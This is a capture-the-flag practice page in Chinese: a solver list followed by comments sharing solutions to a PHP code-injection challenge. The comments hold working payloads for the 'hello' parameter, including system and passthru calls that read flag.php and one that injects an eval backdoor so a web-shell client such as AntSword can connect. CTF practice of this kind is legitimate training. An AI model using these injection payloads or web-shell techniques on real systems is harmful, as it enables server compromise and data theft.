评分(10)
解题动态
18996315220 攻破了该题 47分钟前
BLX123 攻破了该题 8小时前
xjn12 攻破了该题 12小时前
SDLbyZ 攻破了该题 12小时前
771232546 攻破了该题 14小时前
19941759966 攻破了该题 15小时前
lancertyk 攻破了该题 1天前
zdabajfk 攻破了该题 1天前
---snow--- 攻破了该题 1天前
1293273679 攻破了该题 1天前
homniloquy 攻破了该题 1天前
violet06 攻破了该题 1天前
Oliver23 攻破了该题 2天前
wwwwzh123 攻破了该题 2天前
sdxsdxl 攻破了该题 2天前
yaoyao0 攻破了该题 2天前
白露早 攻破了该题 2天前
liberator 攻破了该题 2天前
nidexun 攻破了该题 2天前
评论
dlgz 4月前
举报
?hello=file(%27flag.php%27) ?hello=system(%27tac%20f*%27)
wuzhi唔知 4月前
举报
http://IP:PORT/?hello="<input%20value=%27$flag%27>" ---TEST end
Bruce20231767 4月前
举报
http://117.72.52.127:18257/?hello=system(%22tac%20flag.php%22)
lmds 4月前
举报
?hello=passthru('tac flag.php')
TUGUNBB 5月前
举报
?hello=system("base64 flag.php"),拿到的东西base64解码就行了
iNMB 5月前
举报
简单粗暴,直接连蚁剑?hello=);eval($_POST[%27attack%27]);//
一个姓⎝李⎠的师傅~ 4月前
举报
@a6819772 看你 \$_POST['这里用什么接收'] 就填写什么密码
a6819772 4月前
举报
密码填什么 连蚁剑的话
SLfanCTF 5月前
举报
?hello=show_source(next(array_reverse(scandir(current(localeconv())))))
zhuizhui 5月前
举报
hello=);system('tac fl*');//
简子旼 5月前
举报
?hello=file(%27flag.php%27)
lwgzs 6月前
举报
php file